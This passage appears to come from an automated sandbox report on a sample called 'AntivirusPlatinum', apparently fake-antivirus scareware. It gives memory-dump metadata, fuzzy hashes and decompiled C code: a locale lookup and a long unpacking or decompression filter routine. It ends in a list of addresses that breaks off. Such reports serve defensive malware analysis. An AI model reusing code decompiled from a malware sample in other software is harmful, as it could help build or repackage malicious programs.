                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: EA
                                                                                                                                                              • API String ID: 0-1759796954
                                                                                                                                                              • Opcode ID: 8628abb3b80d9cb63cb5d0152fc648dc47c1fe5bfa02992019f208037f242e52
                                                                                                                                                              • Instruction ID: e36e1c60de2598ddb41f7bca5aedb0013dabc96c6f449a0bc5bfce457db8d824
                                                                                                                                                              • Opcode Fuzzy Hash: 8628abb3b80d9cb63cb5d0152fc648dc47c1fe5bfa02992019f208037f242e52
                                                                                                                                                              • Instruction Fuzzy Hash: 8CD14B72A0061ADFCF14CF58C884599B7F1FF8C318B2685ADD819AB245D731BA56CF84
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040A86C() {
                                                                                                                                                              				char _v104;
                                                                                                                                                              
                                                                                                                                                              				GetLocaleInfoA(0x400, 0xf,  &_v104, 0x64);
                                                                                                                                                              				return _v104;
                                                                                                                                                              			}




                                                                                                                                                              0x0040a87f
                                                                                                                                                              0x0040a88a

                                                                                                                                                              APIs
                                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000400,0000000F,?,00000064), ref: 0040A87F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                              • Opcode ID: 829ba670a0fa1757a0144cb269cf4ad3e50a0cada9b3a97f802edfc538549171
                                                                                                                                                              • Instruction ID: c13786068502227b452c93a03eb0fb89719701edabe44a7bd0f48a7f58202c8b
                                                                                                                                                              • Opcode Fuzzy Hash: 829ba670a0fa1757a0144cb269cf4ad3e50a0cada9b3a97f802edfc538549171
                                                                                                                                                              • Instruction Fuzzy Hash: 9DC08CA064434D2EE710E3A05E07FAE7EFC4700B0AF000060FB09FB0C1D1E0DA2A866A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00407E0E(void* __ecx, signed int _a4) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				signed int _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				signed char* _v24;
                                                                                                                                                              				signed int _v28;
                                                                                                                                                              				signed int _v32;
                                                                                                                                                              				signed int _v36;
                                                                                                                                                              				signed int _v40;
                                                                                                                                                              				signed int _v44;
                                                                                                                                                              				signed int _v48;
                                                                                                                                                              				signed int _v52;
                                                                                                                                                              				signed int _v56;
                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                              				intOrPtr _v68;
                                                                                                                                                              				intOrPtr _v72;
                                                                                                                                                              				intOrPtr _v76;
                                                                                                                                                              				intOrPtr _v80;
                                                                                                                                                              				signed int _v84;
                                                                                                                                                              				signed int _t227;
                                                                                                                                                              				signed int _t231;
                                                                                                                                                              				signed int _t242;
                                                                                                                                                              				signed int _t246;
                                                                                                                                                              				signed int _t247;
                                                                                                                                                              				signed int _t249;
                                                                                                                                                              				void* _t257;
                                                                                                                                                              				signed int _t260;
                                                                                                                                                              				signed int _t261;
                                                                                                                                                              				signed int _t265;
                                                                                                                                                              				signed int* _t283;
                                                                                                                                                              				signed int _t285;
                                                                                                                                                              				signed int _t286;
                                                                                                                                                              				signed int _t287;
                                                                                                                                                              				signed int _t288;
                                                                                                                                                              				signed int _t289;
                                                                                                                                                              				char _t291;
                                                                                                                                                              				signed int _t293;
                                                                                                                                                              				unsigned int _t298;
                                                                                                                                                              				void* _t299;
                                                                                                                                                              				signed int _t300;
                                                                                                                                                              				void* _t301;
                                                                                                                                                              				signed int _t302;
                                                                                                                                                              				signed int* _t304;
                                                                                                                                                              				signed int _t306;
                                                                                                                                                              				signed int _t311;
                                                                                                                                                              				signed int _t313;
                                                                                                                                                              				intOrPtr _t317;
                                                                                                                                                              				signed int _t322;
                                                                                                                                                              				signed int _t327;
                                                                                                                                                              				signed int _t328;
                                                                                                                                                              				char _t329;
                                                                                                                                                              				signed int _t330;
                                                                                                                                                              				void* _t332;
                                                                                                                                                              				signed int _t333;
                                                                                                                                                              				void* _t337;
                                                                                                                                                              				signed int _t342;
                                                                                                                                                              				signed int _t343;
                                                                                                                                                              				void* _t344;
                                                                                                                                                              				signed int _t345;
                                                                                                                                                              				void* _t346;
                                                                                                                                                              				signed int _t349;
                                                                                                                                                              				void* _t350;
                                                                                                                                                              				signed int _t355;
                                                                                                                                                              				signed int _t356;
                                                                                                                                                              				signed int _t357;
                                                                                                                                                              				signed int _t360;
                                                                                                                                                              				signed int _t361;
                                                                                                                                                              				void* _t364;
                                                                                                                                                              				signed int _t366;
                                                                                                                                                              				signed int* _t367;
                                                                                                                                                              				signed int _t368;
                                                                                                                                                              				signed char* _t369;
                                                                                                                                                              				signed int* _t370;
                                                                                                                                                              				signed int _t379;
                                                                                                                                                              				void* _t380;
                                                                                                                                                              				void* _t381;
                                                                                                                                                              				void* _t382;
                                                                                                                                                              
                                                                                                                                                              				_t330 = _a4;
                                                                                                                                                              				_t382 = _t381 - 0x50;
                                                                                                                                                              				_t364 = __ecx;
                                                                                                                                                              				if(_t330 <= 0) {
                                                                                                                                                              					L98:
                                                                                                                                                              					return _t227;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t330 <= 2) {
                                                                                                                                                              					_t227 =  *(__ecx + 0x20);
                                                                                                                                                              					_t304 =  *(__ecx + 0xc);
                                                                                                                                                              					_t366 =  *(__ecx + 0x28);
                                                                                                                                                              					__eflags = _t227 - 0x3c000;
                                                                                                                                                              					if(_t227 >= 0x3c000) {
                                                                                                                                                              						L97:
                                                                                                                                                              						goto L98;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _t227 - 4;
                                                                                                                                                              					if(_t227 < 4) {
                                                                                                                                                              						goto L97;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _t330 - 2;
                                                                                                                                                              					_a4 = _a4 & 0x00000000;
                                                                                                                                                              					_t349 = _t227 - 4;
                                                                                                                                                              					_t332 = (_t330 & 0xffffff00 | _t330 == 0x00000002) + 0xe8;
                                                                                                                                                              					__eflags = _t349;
                                                                                                                                                              					if(_t349 <= 0) {
                                                                                                                                                              						goto L97;
                                                                                                                                                              					} else {
                                                                                                                                                              						goto L87;
                                                                                                                                                              					}
                                                                                                                                                              					do {
                                                                                                                                                              						L87:
                                                                                                                                                              						_t227 =  *_t304;
                                                                                                                                                              						_t304 =  &(_t304[0]);
                                                                                                                                                              						_a4 = _a4 + 1;
                                                                                                                                                              						_t366 = _t366 + 1;
                                                                                                                                                              						__eflags = _t227 - 0xe8;
                                                                                                                                                              						if(_t227 == 0xe8) {
                                                                                                                                                              							L89:
                                                                                                                                                              							_t227 =  *_t304;
                                                                                                                                                              							__eflags = _t227;
                                                                                                                                                              							if(_t227 >= 0) {
                                                                                                                                                              								__eflags = _t227 - 0x1000000;
                                                                                                                                                              								if(_t227 >= 0x1000000) {
                                                                                                                                                              									L95:
                                                                                                                                                              									_a4 = _a4 + 4;
                                                                                                                                                              									_t304 =  &(_t304[1]);
                                                                                                                                                              									_t366 = _t366 + 4;
                                                                                                                                                              									__eflags = _t366;
                                                                                                                                                              									goto L96;
                                                                                                                                                              								}
                                                                                                                                                              								_t227 = _t227 - _t366;
                                                                                                                                                              								__eflags = _t227;
                                                                                                                                                              								L94:
                                                                                                                                                              								 *_t304 = _t227;
                                                                                                                                                              								goto L95;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _t366 + _t227;
                                                                                                                                                              							if(_t366 + _t227 < 0) {
                                                                                                                                                              								goto L95;
                                                                                                                                                              							}
                                                                                                                                                              							_t227 = _t227 + 0x1000000;
                                                                                                                                                              							goto L94;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _t227 - _t332;
                                                                                                                                                              						if(_t227 != _t332) {
                                                                                                                                                              							goto L96;
                                                                                                                                                              						}
                                                                                                                                                              						goto L89;
                                                                                                                                                              						L96:
                                                                                                                                                              						__eflags = _a4 - _t349;
                                                                                                                                                              					} while (_a4 < _t349);
                                                                                                                                                              					goto L97;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t330 == 3) {
                                                                                                                                                              					_a4 =  *(__ecx + 0xc);
                                                                                                                                                              					_t227 =  *(__ecx + 0x20);
                                                                                                                                                              					__eflags = _t227 - 0x3c000;
                                                                                                                                                              					if(_t227 >= 0x3c000) {
                                                                                                                                                              						goto L97;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _t227 - 0x15;
                                                                                                                                                              					if(_t227 < 0x15) {
                                                                                                                                                              						goto L97;
                                                                                                                                                              					}
                                                                                                                                                              					_t227 = _t227 + 0xffffffeb;
                                                                                                                                                              					_t298 =  *(__ecx + 0x28) >> 4;
                                                                                                                                                              					__eflags = _t227;
                                                                                                                                                              					if(_t227 <= 0) {
                                                                                                                                                              						goto L97;
                                                                                                                                                              					}
                                                                                                                                                              					_t231 = (_t227 - 1 >> 4) + 1;
                                                                                                                                                              					__eflags = _t231;
                                                                                                                                                              					_v48 = _t231;
                                                                                                                                                              					do {
                                                                                                                                                              						_t227 = ( *_a4 & 0x1f) - 0x10;
                                                                                                                                                              						__eflags = _t227;
                                                                                                                                                              						if(_t227 < 0) {
                                                                                                                                                              							goto L82;
                                                                                                                                                              						}
                                                                                                                                                              						_t227 =  *((intOrPtr*)(_t227 + 0x41408c));
                                                                                                                                                              						__eflags = _t227;
                                                                                                                                                              						if(_t227 == 0) {
                                                                                                                                                              							goto L82;
                                                                                                                                                              						}
                                                                                                                                                              						_t196 =  &_v32;
                                                                                                                                                              						 *_t196 = _v32 & 0x00000000;
                                                                                                                                                              						__eflags =  *_t196;
                                                                                                                                                              						_v56 = _t227 & 0x000000ff;
                                                                                                                                                              						_t350 = 0x12;
                                                                                                                                                              						do {
                                                                                                                                                              							_t227 = 1 << _v32;
                                                                                                                                                              							_t306 = _v56;
                                                                                                                                                              							__eflags = _t306 & 1;
                                                                                                                                                              							if((_t306 & 1) != 0) {
                                                                                                                                                              								_t203 = _t350 + 0x18; // 0x2a
                                                                                                                                                              								_t227 = E00407C4E(_t330, _a4, _t203, 4);
                                                                                                                                                              								__eflags = _t227 - 5;
                                                                                                                                                              								if(_t227 == 5) {
                                                                                                                                                              									__eflags = E00407C4E(_t330, _a4, _t350, 0x14) - _t298 & 0x000fffff;
                                                                                                                                                              									_t227 = E00407C9E(_t330, _a4, E00407C4E(_t330, _a4, _t350, 0x14) - _t298 & 0x000fffff, _t350, 0x14);
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							_v32 = _v32 + 1;
                                                                                                                                                              							_t350 = _t350 + 0x29;
                                                                                                                                                              							__eflags = _t350 - 0x64;
                                                                                                                                                              						} while (_t350 <= 0x64);
                                                                                                                                                              						L82:
                                                                                                                                                              						_a4 = _a4 + 0x10;
                                                                                                                                                              						_t298 = _t298 + 1;
                                                                                                                                                              						_t211 =  &_v48;
                                                                                                                                                              						 *_t211 = _v48 - 1;
                                                                                                                                                              						__eflags =  *_t211;
                                                                                                                                                              					} while ( *_t211 != 0);
                                                                                                                                                              					goto L97;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t330 == 4) {
                                                                                                                                                              					_t227 =  *(__ecx + 0x20);
                                                                                                                                                              					_t333 =  *(__ecx + 0x14);
                                                                                                                                                              					_t367 =  *(__ecx + 0xc);
                                                                                                                                                              					_t311 =  *(__ecx + 0x10) - 3;
                                                                                                                                                              					_v20 = _t227;
                                                                                                                                                              					_v56 = _t311;
                                                                                                                                                              					_v52 = _t333;
                                                                                                                                                              					_v32 = _t367;
                                                                                                                                                              					_t299 = _t367 + _t227;
                                                                                                                                                              					_t367[0xf008] = _t227;
                                                                                                                                                              					__eflags = _t227 - 0x1e000;
                                                                                                                                                              					if(_t227 >= 0x1e000) {
                                                                                                                                                              						goto L97;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _t333;
                                                                                                                                                              					if(_t333 < 0) {
                                                                                                                                                              						goto L97;
                                                                                                                                                              					}
                                                                                                                                                              					_t132 =  &_v12;
                                                                                                                                                              					 *_t132 = _v12 & 0x00000000;
                                                                                                                                                              					__eflags =  *_t132;
                                                                                                                                                              					_v24 =  ~_t311;
                                                                                                                                                              					do {
                                                                                                                                                              						_t242 = _v20;
                                                                                                                                                              						_a4 = _a4 & 0x00000000;
                                                                                                                                                              						__eflags = _v12 - _t242;
                                                                                                                                                              						if(_v12 >= _t242) {
                                                                                                                                                              							goto L66;
                                                                                                                                                              						}
                                                                                                                                                              						_t368 = _v24;
                                                                                                                                                              						_v28 = _t368;
                                                                                                                                                              						_t369 = _t368 + _t299;
                                                                                                                                                              						_t313 = 3;
                                                                                                                                                              						_t246 = (_t242 - _v12 - 1) / _t313 + 1;
                                                                                                                                                              						__eflags = _t246;
                                                                                                                                                              						_v16 = _t246;
                                                                                                                                                              						do {
                                                                                                                                                              							__eflags = _v28 - 3;
                                                                                                                                                              							if(_v28 < 3) {
                                                                                                                                                              								L64:
                                                                                                                                                              								_t247 = _a4;
                                                                                                                                                              								goto L65;
                                                                                                                                                              							}
                                                                                                                                                              							_t351 =  *_t369 & 0x000000ff;
                                                                                                                                                              							_t250 =  *(_t369 - 3) & 0x000000ff;
                                                                                                                                                              							_v40 =  *_t369 & 0x000000ff;
                                                                                                                                                              							_v36 =  *(_t369 - 3) & 0x000000ff;
                                                                                                                                                              							_v48 = E0040A7CD(_t351 - _t250 + _a4 - _a4);
                                                                                                                                                              							_v44 = E0040A7CD(_t351 - _t250 + _a4 - _v40);
                                                                                                                                                              							_t257 = E0040A7CD(_t351 - _t250 + _a4 - _v36);
                                                                                                                                                              							_t382 = _t382 + 0xc;
                                                                                                                                                              							__eflags = _v48 - _v44;
                                                                                                                                                              							if(_v48 > _v44) {
                                                                                                                                                              								L61:
                                                                                                                                                              								__eflags = _v44 - _t257;
                                                                                                                                                              								if(_v44 > _t257) {
                                                                                                                                                              									_t247 = _v36;
                                                                                                                                                              								} else {
                                                                                                                                                              									_t247 = _v40;
                                                                                                                                                              								}
                                                                                                                                                              								goto L65;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _v48 - _t257;
                                                                                                                                                              							if(_v48 <= _t257) {
                                                                                                                                                              								goto L64;
                                                                                                                                                              							}
                                                                                                                                                              							goto L61;
                                                                                                                                                              							L65:
                                                                                                                                                              							_v32 = _v32 + 1;
                                                                                                                                                              							_v28 = _v28 + 3;
                                                                                                                                                              							_t249 = _t247 -  *_v32 & 0x000000ff;
                                                                                                                                                              							_t369[_v56] = _t249;
                                                                                                                                                              							_t369 =  &(_t369[3]);
                                                                                                                                                              							_t171 =  &_v16;
                                                                                                                                                              							 *_t171 = _v16 - 1;
                                                                                                                                                              							__eflags =  *_t171;
                                                                                                                                                              							_a4 = _t249;
                                                                                                                                                              						} while ( *_t171 != 0);
                                                                                                                                                              						L66:
                                                                                                                                                              						_v12 = _v12 + 1;
                                                                                                                                                              						_v24 =  &(_v24[1]);
                                                                                                                                                              						__eflags = _v12 - 3;
                                                                                                                                                              					} while (_v12 < 3);
                                                                                                                                                              					_t227 = _v52;
                                                                                                                                                              					_t337 = _v20 + 0xfffffffe;
                                                                                                                                                              					while(1) {
                                                                                                                                                              						__eflags = _t227 - _t337;
                                                                                                                                                              						if(_t227 >= _t337) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						_t317 =  *((intOrPtr*)(_t227 + _t299 + 1));
                                                                                                                                                              						 *((intOrPtr*)(_t227 + _t299)) =  *((intOrPtr*)(_t227 + _t299)) + _t317;
                                                                                                                                                              						 *((intOrPtr*)(_t227 + _t299 + 2)) =  *((intOrPtr*)(_t227 + _t299 + 2)) + _t317;
                                                                                                                                                              						_t227 = _t227 + 3;
                                                                                                                                                              						__eflags = _t227;
                                                                                                                                                              					}
                                                                                                                                                              					goto L97;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t330 == 5) {
                                                                                                                                                              					_t355 =  *(__ecx + 0x20);
                                                                                                                                                              					_t227 =  *(__ecx + 0x10);
                                                                                                                                                              					_t370 =  *(__ecx + 0xc);
                                                                                                                                                              					_t318 = _t370 + _t355;
                                                                                                                                                              					_v44 = _t355;
                                                                                                                                                              					_v48 = _t227;
                                                                                                                                                              					_v24 = _t370;
                                                                                                                                                              					_v52 = _t370 + _t355;
                                                                                                                                                              					_t370[0xf008] = _t355;
                                                                                                                                                              					__eflags = _t355 - 0x1e000;
                                                                                                                                                              					if(_t355 >= 0x1e000) {
                                                                                                                                                              						goto L97;
                                                                                                                                                              					}
                                                                                                                                                              					_t300 = 0;
                                                                                                                                                              					__eflags = _t227;
                                                                                                                                                              					_v20 = 0;
                                                                                                                                                              					if(_t227 > 0) {
                                                                                                                                                              						goto L25;
                                                                                                                                                              						while(1) {
                                                                                                                                                              							L50:
                                                                                                                                                              							_v28 = _t260;
                                                                                                                                                              							if(__eflags >= 0) {
                                                                                                                                                              								break;
                                                                                                                                                              							}
                                                                                                                                                              							_t261 = _v36;
                                                                                                                                                              							_t356 = _t300;
                                                                                                                                                              							_t300 = _t261 - _v16;
                                                                                                                                                              							_t322 =  *_v24 & 0x000000ff;
                                                                                                                                                              							_v24 = _v24 + 1;
                                                                                                                                                              							_t342 = _v40;
                                                                                                                                                              							_v16 = _t261;
                                                                                                                                                              							_v56 = _t322;
                                                                                                                                                              							_t265 = (_t356 * _a4 + _v8 * _t300 + _v12 * _t261 + _t342 * 0x00000008 >> 0x00000003 & 0x000000ff) - _t322;
                                                                                                                                                              							 *((char*)(_v28 + _v52)) = _t265;
                                                                                                                                                              							_t318 = _t265 - _t342;
                                                                                                                                                              							_t377 = _v56 << 3;
                                                                                                                                                              							_v36 = _t265 - _t342;
                                                                                                                                                              							_v40 = _t265;
                                                                                                                                                              							_v84 = _v84 + E0040A7CD(_v56 << 3);
                                                                                                                                                              							_v80 = _v80 + E0040A7CD((_v56 << 3) - _v16);
                                                                                                                                                              							_v76 = _v76 + E0040A7CD(_v16 + (_v56 << 3));
                                                                                                                                                              							_v72 = _v72 + E0040A7CD((_v56 << 3) - _t300);
                                                                                                                                                              							_v68 = _v68 + E0040A7CD(_t377 + _t300);
                                                                                                                                                              							_v64 = _v64 + E0040A7CD(_t377 - _t356);
                                                                                                                                                              							_v60 = _v60 + E0040A7CD(_t377 + _t356);
                                                                                                                                                              							_t382 = _t382 + 0x1c;
                                                                                                                                                              							__eflags = _v32 & 0x0000001f;
                                                                                                                                                              							if((_v32 & 0x0000001f) != 0) {
                                                                                                                                                              								L49:
                                                                                                                                                              								_t260 = _v28 + _v48;
                                                                                                                                                              								_v32 = _v32 + 1;
                                                                                                                                                              								__eflags = _t260 - _v44;
                                                                                                                                                              								continue;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t379 = _v84;
                                                                                                                                                              								_t357 = 0;
                                                                                                                                                              								_v84 = 0;
                                                                                                                                                              								_t327 = 1;
                                                                                                                                                              								__eflags = 1;
                                                                                                                                                              								goto L28;
                                                                                                                                                              								L30:
                                                                                                                                                              								 *_t283 =  *_t283 & 0x00000000;
                                                                                                                                                              								_t327 = _t327 + 1;
                                                                                                                                                              								__eflags = _t327 - 7;
                                                                                                                                                              								if(_t327 < 7) {
                                                                                                                                                              									L28:
                                                                                                                                                              									_t283 = _t380 + _t327 * 4 - 0x50;
                                                                                                                                                              									_t343 =  *_t283;
                                                                                                                                                              									__eflags = _t343 - _t379;
                                                                                                                                                              									if(_t343 < _t379) {
                                                                                                                                                              										_t379 = _t343;
                                                                                                                                                              										_t357 = _t327;
                                                                                                                                                              									}
                                                                                                                                                              									goto L30;
                                                                                                                                                              								} else {
                                                                                                                                                              									_t285 = _t357 - 1;
                                                                                                                                                              									__eflags = _t285;
                                                                                                                                                              									if(_t285 == 0) {
                                                                                                                                                              										__eflags = _v12 - 0xfffffff0;
                                                                                                                                                              										if(_v12 >= 0xfffffff0) {
                                                                                                                                                              											_t110 =  &_v12;
                                                                                                                                                              											 *_t110 = _v12 - 1;
                                                                                                                                                              											__eflags =  *_t110;
                                                                                                                                                              										}
                                                                                                                                                              									} else {
                                                                                                                                                              										_t286 = _t285 - 1;
                                                                                                                                                              										__eflags = _t286;
                                                                                                                                                              										if(_t286 == 0) {
                                                                                                                                                              											__eflags = _v12 - 0x10;
                                                                                                                                                              											if(_v12 < 0x10) {
                                                                                                                                                              												_v12 = _v12 + 1;
                                                                                                                                                              											}
                                                                                                                                                              										} else {
                                                                                                                                                              											_t287 = _t286 - 1;
                                                                                                                                                              											__eflags = _t287;
                                                                                                                                                              											if(_t287 == 0) {
                                                                                                                                                              												__eflags = _v8 - 0xfffffff0;
                                                                                                                                                              												if(_v8 >= 0xfffffff0) {
                                                                                                                                                              													_v8 = _v8 - 1;
                                                                                                                                                              												}
                                                                                                                                                              											} else {
                                                                                                                                                              												_t288 = _t287 - 1;
                                                                                                                                                              												__eflags = _t288;
                                                                                                                                                              												if(_t288 == 0) {
                                                                                                                                                              													__eflags = _v8 - 0x10;
                                                                                                                                                              													if(_v8 < 0x10) {
                                                                                                                                                              														_v8 = _v8 + 1;
                                                                                                                                                              													}
                                                                                                                                                              												} else {
                                                                                                                                                              													_t289 = _t288 - 1;
                                                                                                                                                              													__eflags = _t289;
                                                                                                                                                              													if(_t289 == 0) {
                                                                                                                                                              														__eflags = _a4 - 0xfffffff0;
                                                                                                                                                              														if(_a4 >= 0xfffffff0) {
                                                                                                                                                              															_a4 = _a4 - 1;
                                                                                                                                                              														}
                                                                                                                                                              													} else {
                                                                                                                                                              														__eflags = _t289 == 1;
                                                                                                                                                              														if(_t289 == 1) {
                                                                                                                                                              															__eflags = _a4 - 0x10;
                                                                                                                                                              															if(_a4 < 0x10) {
                                                                                                                                                              																_a4 = _a4 + 1;
                                                                                                                                                              															}
                                                                                                                                                              														}
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									goto L49;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_v20 = _v20 + 1;
                                                                                                                                                              						_t227 = _v20;
                                                                                                                                                              						__eflags = _t227 - _v48;
                                                                                                                                                              						if(_t227 < _v48) {
                                                                                                                                                              							_t355 = _v44;
                                                                                                                                                              							_t300 = 0;
                                                                                                                                                              							__eflags = 0;
                                                                                                                                                              							L25:
                                                                                                                                                              							_v40 = _t300;
                                                                                                                                                              							_v36 = _t300;
                                                                                                                                                              							_v16 = _t300;
                                                                                                                                                              							_v12 = _t300;
                                                                                                                                                              							_v8 = _t300;
                                                                                                                                                              							_a4 = _t300;
                                                                                                                                                              							E0040A289(_t318,  &_v84, _t300, 0x1c);
                                                                                                                                                              							_t260 = _v20;
                                                                                                                                                              							_v32 = _v32 & 0x00000000;
                                                                                                                                                              							__eflags = _t260 - _t355;
                                                                                                                                                              							goto L50;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					goto L97;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t330 == 6) {
                                                                                                                                                              					_t328 =  *(__ecx + 0x20);
                                                                                                                                                              					_t227 =  *(__ecx + 0x10);
                                                                                                                                                              					_t301 = 0;
                                                                                                                                                              					_v32 = _t227;
                                                                                                                                                              					_t344 = _t328 + _t328;
                                                                                                                                                              					( *(__ecx + 0xc))[0xf008] = _t328;
                                                                                                                                                              					__eflags = _t328 - 0x1e000;
                                                                                                                                                              					if(_t328 >= 0x1e000) {
                                                                                                                                                              						goto L97;
                                                                                                                                                              					}
                                                                                                                                                              					_a4 = _a4 & 0;
                                                                                                                                                              					__eflags = _t227;
                                                                                                                                                              					if(_t227 <= 0) {
                                                                                                                                                              						goto L97;
                                                                                                                                                              					} else {
                                                                                                                                                              						goto L16;
                                                                                                                                                              					}
                                                                                                                                                              					do {
                                                                                                                                                              						L16:
                                                                                                                                                              						_t291 = 0;
                                                                                                                                                              						_t360 = _a4 + _t328;
                                                                                                                                                              						L18:
                                                                                                                                                              						__eflags = _t360 - _t344;
                                                                                                                                                              						if(_t360 < _t344) {
                                                                                                                                                              							_t345 =  *(_t364 + 0xc);
                                                                                                                                                              							_t291 = _t291 -  *((intOrPtr*)(_t345 + _t301));
                                                                                                                                                              							_t301 = _t301 + 1;
                                                                                                                                                              							 *((char*)(_t345 + _t360)) = _t291;
                                                                                                                                                              							_t360 = _t360 + _v32;
                                                                                                                                                              							__eflags = _t360;
                                                                                                                                                              							_t344 = _t328 + _t328;
                                                                                                                                                              							goto L18;
                                                                                                                                                              						}
                                                                                                                                                              						_a4 = _a4 + 1;
                                                                                                                                                              						_t227 = _a4;
                                                                                                                                                              						__eflags = _t227 - _v32;
                                                                                                                                                              					} while (_t227 < _v32);
                                                                                                                                                              					goto L97;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t330 != 7) {
                                                                                                                                                              					goto L97;
                                                                                                                                                              				}
                                                                                                                                                              				_t302 =  *(__ecx + 0x20);
                                                                                                                                                              				_t346 = 0;
                                                                                                                                                              				_t361 = _t302;
                                                                                                                                                              				if(_t302 >= 0x1e000) {
                                                                                                                                                              					goto L97;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t302 <= 0) {
                                                                                                                                                              					L13:
                                                                                                                                                              					 *((intOrPtr*)( *(_t364 + 0xc) + 0x3c01c)) = _t361 - _t302;
                                                                                                                                                              					_t227 =  *(_t364 + 0xc);
                                                                                                                                                              					 *(_t227 + 0x3c020) = _t302;
                                                                                                                                                              					goto L97;
                                                                                                                                                              				} else {
                                                                                                                                                              					goto L9;
                                                                                                                                                              				}
                                                                                                                                                              				do {
                                                                                                                                                              					L9:
                                                                                                                                                              					_t293 =  *(_t364 + 0xc);
                                                                                                                                                              					_t329 =  *((intOrPtr*)(_t293 + _t346));
                                                                                                                                                              					_t346 = _t346 + 1;
                                                                                                                                                              					if(_t329 == 2) {
                                                                                                                                                              						_t329 =  *((intOrPtr*)(_t293 + _t346));
                                                                                                                                                              						_t346 = _t346 + 1;
                                                                                                                                                              						if(_t329 != 2) {
                                                                                                                                                              							_t329 = _t329 + 0xe0;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					 *((char*)(_t293 + _t361)) = _t329;
                                                                                                                                                              					_t361 = _t361 + 1;
                                                                                                                                                              				} while (_t346 < _t302);
                                                                                                                                                              				goto L13;
                                                                                                                                                              			}

















































































                                                                                                                                                              0x00407e11
                                                                                                                                                              0x00407e14
                                                                                                                                                              0x00407e18
                                                                                                                                                              0x00407e1c
                                                                                                                                                              0x004082ff
                                                                                                                                                              0x00408301
                                                                                                                                                              0x00408301
                                                                                                                                                              0x00407e27
                                                                                                                                                              0x00408297
                                                                                                                                                              0x0040829a
                                                                                                                                                              0x0040829d
                                                                                                                                                              0x004082a0
                                                                                                                                                              0x004082a5
                                                                                                                                                              0x004082fd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004082fe
                                                                                                                                                              0x004082a7
                                                                                                                                                              0x004082aa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004082ac
                                                                                                                                                              0x004082b2
                                                                                                                                                              0x004082b6
                                                                                                                                                              0x004082b9
                                                                                                                                                              0x004082bc
                                                                                                                                                              0x004082be
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004082c0
                                                                                                                                                              0x004082c0
                                                                                                                                                              0x004082c0
                                                                                                                                                              0x004082c2
                                                                                                                                                              0x004082c3
                                                                                                                                                              0x004082c6
                                                                                                                                                              0x004082c7
                                                                                                                                                              0x004082c9
                                                                                                                                                              0x004082cf
                                                                                                                                                              0x004082cf
                                                                                                                                                              0x004082d1
                                                                                                                                                              0x004082d3
                                                                                                                                                              0x004082e3
                                                                                                                                                              0x004082e8
                                                                                                                                                              0x004082ee
                                                                                                                                                              0x004082ee
                                                                                                                                                              0x004082f2
                                                                                                                                                              0x004082f5
                                                                                                                                                              0x004082f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004082f5
